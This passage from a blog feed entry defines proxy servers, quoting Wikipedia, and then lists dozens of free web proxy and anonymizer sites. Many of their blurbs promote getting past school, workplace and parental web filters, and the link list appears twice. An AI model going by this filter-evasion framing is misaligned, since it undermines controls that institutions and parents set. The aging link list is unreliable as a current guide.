href="http://www.proxy77.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxy77.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.surf-anon.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.surf-anon.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.free-proxy.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.free-proxy.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.theproxysite.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.theproxysite.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxyify.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyify.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.concealme.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.concealme.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://browseschool.info/"&gt;&lt;span style="color: #351c75;"&gt;http://browseschool.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://browsework.info/"&gt;&lt;span style="color: #351c75;"&gt;http://browsework.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://browsingschool.info/"&gt;&lt;span style="color: #351c75;"&gt;http://browsingschool.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://browsingwork.info/"&gt;&lt;span style="color: #351c75;"&gt;http://browsingwork.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://browsingschool.com/"&gt;&lt;span style="color: #351c75;"&gt;http://browsingschool.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxyindex.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyindex.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.gobyproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.gobyproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxifyme.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxifyme.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxyghost.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyghost.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.spysurfing.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.spysurfing.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.unblockthis.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.unblockthis.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxyserver7.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyserver7.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.daveproxy.co.uk/"&gt;&lt;span style="color: #351c75;"&gt;http://www.daveproxy.co.uk/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.tntproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.tntproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.neoproxy.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.neoproxy.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.bypassbrowser.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.bypassbrowser.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.procksie.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.procksie.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.httproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.httproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.cgiproxy.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.cgiproxy.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.silentsurf.com/cgi-bin/nph-index.cgi"&gt;&lt;span style="color: #351c75;"&gt;http://www.silentsurf.com/cgi-bin/nph-index.cgi&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxy-sock.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxy-sock.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxygeek.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxygeek.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.datadefense.org/"&gt;&lt;span style="color: #351c75;"&gt;http://www.datadefense.org/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.hideyour.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.hideyour.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.howto.pro/"&gt;&lt;span style="color: #351c75;"&gt;http://www.howto.pro/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.collegeproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.collegeproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.demonproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.demonproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.satanproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.satanproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.hidingyou.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.hidingyou.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.intelliproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.intelliproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.fireprox.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.fireprox.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.h0h0h0.com/firewall/"&gt;&lt;span style="color: #351c75;"&gt;http://www.h0h0h0.com/firewall/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.katedrala.cz/"&gt;&lt;span style="color: #351c75;"&gt;http://www.katedrala.cz/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.browseatwork.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.browseatwork.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.2255.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.2255.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.vproxy.be/"&gt;&lt;span style="color: #351c75;"&gt;http://www.vproxy.be/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.boxproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.boxproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.nopimps.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.nopimps.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.fsurf.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.fsurf.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxylord.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxylord.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://roachhost.com/hp/"&gt;&lt;span style="color: #351c75;"&gt;http://roachhost.com/hp/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.freepr0xy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.freepr0xy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxypop.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxypop.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://proxy.winidn.com/"&gt;&lt;span style="color: #351c75;"&gt;http://proxy.winidn.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.cloax.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.cloax.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxy247.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxy247.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.traceless.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.traceless.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.siatec.net/proxyanonymizer"&gt;&lt;span style="color: #351c75;"&gt;http://www.siatec.net/proxyanonymizer&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.stealth-ip.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.stealth-ip.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxywhip.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxywhip.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxy-surf.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxy-surf.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.videoeditors.info/proxy/"&gt;&lt;span style="color: #351c75;"&gt;http://www.videoeditors.info/proxy/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.blockmy.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.blockmy.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxychatroom.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxychatroom.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.teenpropy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.teenpropy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.totalupload.com/surf/"&gt;&lt;span style="color: #351c75;"&gt;http://www.totalupload.com/surf/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxene.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxene.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.fileshack.us/proxy.php"&gt;&lt;span style="color: #351c75;"&gt;http://www.fileshack.us/proxy.php&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.cloaker.ca/"&gt;&lt;span style="color: #351c75;"&gt;http://www.cloaker.ca/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxified.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxified.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.mrreid.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.mrreid.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCblG1QzgyAA6B4-bK24-bI3q17tU3uVkZTT0KhL4f4ogi8VnwoaC40TmtWXqrYOe6a2DnK2w5cz_2yI2LQZVYD2KoBNn5eIROFYYnvP489hWfZ6IOUQy0S5Tf5nx0H4DYpTSXhsiAy_s_/s1600/ppp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCblG1QzgyAA6B4-bK24-bI3q17tU3uVkZTT0KhL4f4ogi8VnwoaC40TmtWXqrYOe6a2DnK2w5cz_2yI2LQZVYD2KoBNn5eIROFYYnvP489hWfZ6IOUQy0S5Tf5nx0H4DYpTSXhsiAy_s_/s320/ppp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b style="color: #674ea7;"&gt;SHARE IT if u like :)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2e9jeYUpSKVLhauKRqWP-ppviY0fqNhdrCOhqH2XpQjztpDm62LRsgzJijsDhHc2A08La7d7ZMGZz2j4MRxMww4Ha4zOn38dfUYrrzlmRJ3uGJXhoKU4xS6ay8QUQ4cNzGAl1r1aausDE/s72-c/proxy-server.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><enclosure length="-1" type="*/*;charset=utf-8" url="http://www.78y.net/"/><itunes:explicit/><itunes:subtitle>* In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server. In this case, it 'caches' responses from the remote server, and returns subsequent requests for the same content directly.The proxy concept was invented in the early days of distributed systems as a way to simplify and control their complexity. Today, most proxies are a web proxy, allowing access to content on the World Wide Web.UsesA proxy server has a large variety of potential purposes, including:&amp;nbsp;&amp;nbsp;&amp;nbsp; To keep machines behind it anonymous, mainly for security.[2] &amp;nbsp;&amp;nbsp;&amp;nbsp; To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.[3] &amp;nbsp;&amp;nbsp;&amp;nbsp; To apply access policy to network services or content, e.g. to block undesired sites. &amp;nbsp;&amp;nbsp;&amp;nbsp; To access sites prohibited or filtered by your ISP or institution. &amp;nbsp;&amp;nbsp;&amp;nbsp; To log / audit usage, i.e. to provide company employee Internet usage reporting. &amp;nbsp;&amp;nbsp;&amp;nbsp; To bypass security / parental controls. &amp;nbsp;&amp;nbsp;&amp;nbsp; To circumvent Internet filtering to access content otherwise blocked by governments.[4] &amp;nbsp;&amp;nbsp;&amp;nbsp; To scan transmitted content for malware before delivery. &amp;nbsp;&amp;nbsp;&amp;nbsp; To scan outbound content, e.g., for data leak protection. &amp;nbsp;&amp;nbsp;&amp;nbsp; To allow a web site to make web requests to externally hosted resources (e.g. images, music files, etc.) when cross-domain restrictions prohibit the web site from linking directly to the outside domains. * source wikipedia * So here is the List of best anonymizers and proxy servers &amp;amp; bypass web-filters ! ShadowBrowser – anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.http://www.proxyking.netAnonymouse – a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.URL (for proxy chaining):http://anonymouse.wsAnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.URL (for proxy chaining):http://www.hidemyass.comProxy7.com – Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.URL (for proxy-chains):http://www.anonymousindex.comwww.HideMyAss.com – Free anonymous browsing, for the times when you REALLY need to hide your ass online!URL (for proxy chaining):www.ProxyFoxy.com – Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.URL (for making proxy chaining):http://www.proxyfoxy.com/78Y.NET – It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.URL (to create proxy chains):http://www.78y.net/www.75i.net - 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.URL (to create chains of proxies):http://www.75i.netwww.dzzt.com – This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You’re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.URL (for proxy chaining):http://www.dzzt.comProxy Guy – The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.URL (for making proxy chaining):http://www.proxyguy.comwww.GamesProxy.com – Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail &amp;amp; more!www.proxyz.be – It is a free internet service which allows you to surf anonymously and it “changes” your ip. You can also use it to access/bypass blocked websites on your school or office.URL (for making proxy chaining):http://www.proxyz.bewww.antifw.tk – Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity.www.ProxyHero.com – Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.URL (for making proxy chaining):http://www.proxyhero.comwww.ProxyDrop.com – This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4URL (for making proxy chaining):http://www.proxydrop.comhttp://www.proxydrop.nethttp://www.proxydrop.bizhttp://www.proxydrop.infohttp://www.proxydrop.orgwww.prx1.com – This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with prx1.com increases your security and lets you access web sites from behind a firewall.URL (for making proxy chains):http://www.prx1.comwww.ninjaproxy.com&amp;nbsp;It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.URL (for making proxy chains):http://www.ninjaproxy.comShadowSurf free anonymous proxy – Surf privately and 100% anonymously with ShadowSurf’s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.URL (for making proxy chaining):http://www.shadowsurf.comFamous5.net Proxy – Free browser based anonymizer without any software. Bypass bans and hide your ip through famous5.net proxy.URL (for making proxy chains):http://www.famous5.netNo1Proxy.com -&amp;nbsp;Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers. URL (for creating proxy chain): http://www.no1proxy.comProxySpy.com – Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime – this means you can always count on it, day or night, to protect you.TheProxy.be – TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1URL (for making proxy chains):http://www.theproxy.behttp://www.newproxy.behttp://www.smartproxy.netProxyPrince.com – Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden.PimpMyIP.com – Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts.OhMyProxy.com – Free Anonymous Browsing. Hide your IP and get past school and work filters.Clever Proxy – Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.A Proxy Site – A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.Fully Sick Proxy – Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.Desire Proxy – Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!Perfect Proxy – Perfect Proxy is just that – perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.Prime Proxy – Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today – it’s 100% free!Proxy Aware – Since you’re visiting freeproxy.ru you must be proxy aware, so why not check out Proxy Aware? It’s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.Proxy Craze – At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!Proxy Gasp – Our proxy is so good it will make you gasp – as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!Proxy Please – Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!Some Proxy – Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!Stupid Proxy – Despite the name, this proxy is anything but stupid! If you’re going to use a proxy, use Stupid Proxy! It’s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and image-less browsing. Enjoy!That Proxy – Which proxy – this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose ‘That Proxy’! By using our site you will remain anonymous and avoid security issues like people hacking your computer.Want Proxy – For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you’re done! ‘Want Proxy’ is an excellent proxy site that you’ll end up using all the time. It’s a favorite amongst students and workers who want to bypass filters.www.UnBlockMySpace.com – Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing!www.ProxyForAll.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.www.MyProxySurfer.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.www.ProxyCat.com – Proxycat.com is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web.www.ProxyDetective.com – ProxyDetective – Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home.www.indianproxy.com – Access your webmail, myspace, and much more in school or work anonymously.www.proxybrowsing.com – Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages!www.ProxyPi.com – We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters.www.proxyjet.com – Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters.www.justhide.com – We allow you to bypass your school and work filters to allow you surf the internet anonymously.Other anonymizersAnonymization – free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf – surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than 5.000.000.000 web pages.URL (for proxy chaining):http://www.anonymization.netGuardster – good anonymizer. Controls cookies, scripts, ADs, images and referrers.URL (for proxy chaining):http://www.guardster.comProxyWeb – good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection – so nobody can detect what you download from Internet.URL (for proxy chaining):http://www.proxyweb.netWebWarper – This is a popular free web anonymizer. This CGI proxy can pack web pages “on the fly”.URL (for proxy chaining):http://webwarper.netMegaProxy – Free anonymizer can work with HTTPS sites.URL (for proxy chaining):http://www.megaproxy.comhttp://www.amegaproxy.comW3Privacy.com – free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.URL (for proxy chaining):http://www.w3privacy.comAnonymizer.RU – russian anonymizer: this russian CGI proxy has many additional options only after registration.URL (for proxy chaining):http://www.anonymizer.ruThe-cloak – This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..URL (for chaining proxy):http://www.the-cloak.comPure privacy – cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)URL (for proxy chaining):http://www.pureprivacy.comProxify.com – Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.URL (for proxy chaining):http://proxify.comhttp://www.urlencoded.com– The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.URL (for cgi proxy chaining):http://www.urlencoded.comhttp://www.snoopblocker.com – Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Can enable/lock Java, JavaScript, Cookies, ActiveX.URL (for creating anonymizers chain):http://www.snoopblocker.comhttp://www.long999.com– Mirrorwww.psurf.net – Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!http://www.phproxy.infohttp://www.proxy121.com– The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1http://www.bigate.com/cgi-bin/bigate/b/k/k/http://www.userbeam.dehttp://www.calcmaster.nethttp://www.misterprivacy.com/begin_anonymous_surfing.htmhttp://www.myshield.comhttp://www.idzap.comhttp://www.safegatetech.comhttp://www.breiter.ch/http://www.rrdb.org/rrdbproxy.php?l=enhttp://proxy.decodes.biz/http://proxy.mxds.ch/http://www.spondoo.com/http://search.sicomm.us/http://schnarre-monika.celebrityblog.net/cache.cgihttp://filter2005.com/http://www.kproxy.com/http://www.websitereactor.org/cgi-bin/001/nph-.plhttp://www.goproxing.com/http://anonycat.com/http://www.spynot.com/http://www.merletn.org/anonymizerhttp://www.cgi-proxy.net/http://www.proxymouse.com/http://www.theunblocker.tk/http://www.betaproxy.com/http://www.letsproxy.com/http://www.freeproxysurf.info/http://www.mysticproxy.com/http://www.proxywave.com/http://www.vtunnel.com/http://www.proxysnail.com/http://www.freeproxy.ca/http://basic.3proxy.com/http://www.privatebrowsing.com/http://www.hackingtruths.org/proxyhttp://xanproxy.be/http://www.ipsecret.com/http://www.proxyanon.com/http://www.anonproxy.info/http://www.proxysafe.com/http://www.strongproxy.com/http://www.boredatschool.net/http://www.ukproxy.com/http://www.simpleproxy.com/http://www.phproxy.org/http://surfonym.com/http://geoepker.hu/freeproxy/http://www.browseatwork.com/http://www.ipblocker.info/http://www.boredatwork.info/http://www.anonymousurfing.info/http://www.browsingwork.com/http://www.freeproxyserver.org/http://www.browseany.com/http://www.browsesecurely.com/http://IEproxy.com/http://www.sneak3.po.gs/http://www.proxytastic.com/http://www.freewebproxy.org/http://www.thecgiproxy.com/http://www.hide-me.be/http://www.anotherproxy.com/http://www.proxy77.com/http://www.surf-anon.com/http://www.free-proxy.info/http://www.theproxysite.info/http://www.proxyify.info/http://www.concealme.com/http://browseschool.info/http://browsework.info/http://browsingschool.info/http://browsingwork.info/http://browsingschool.com/http://www.proxyindex.com/http://www.gobyproxy.com/http://www.proxifyme.com/http://www.proxyghost.com/http://www.spysurfing.com/http://www.unblockthis.com/http://www.proxyserver7.com/http://www.daveproxy.co.uk/http://www.tntproxy.com/http://www.neoproxy.net/http://www.bypassbrowser.com/http://www.procksie.com/http://www.httproxy.com/http://www.cgiproxy.info/http://www.silentsurf.com/cgi-bin/nph-index.cgihttp://www.proxy-sock.com/http://www.proxygeek.com/http://www.datadefense.org/http://www.hideyour.info/http://www.howto.pro/http://www.collegeproxy.com/http://www.demonproxy.com/http://www.satanproxy.com/http://www.hidingyou.com/http://www.intelliproxy.com/http://www.fireprox.com/http://www.h0h0h0.com/firewall/http://www.katedrala.cz/http://www.browseatwork.net/http://www.2255.info/http://www.vproxy.be/http://www.boxproxy.com/http://www.nopimps.com/http://www.fsurf.com/http://www.proxylord.com/http://roachhost.com/hp/http://www.freepr0xy.com/http://www.proxypop.com/http://proxy.winidn.com/http://www.cloax.net/http://www.proxy247.com/http://www.traceless.com/http://www.siatec.net/proxyanonymizerhttp://www.stealth-ip.net/http://www.proxywhip.comhttp://www.proxy-surf.net/http://www.videoeditors.info/proxy/http://www.blockmy.info/http://www.proxychatroom.com/http://www.teenpropy.com/http://www.totalupload.com/surf/http://www.proxene.com/http://www.fileshack.us/proxy.phphttp://www.cloaker.ca/http://www.proxified.net/http://www.mrreid.net SHARE IT if u like :)</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>* In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, 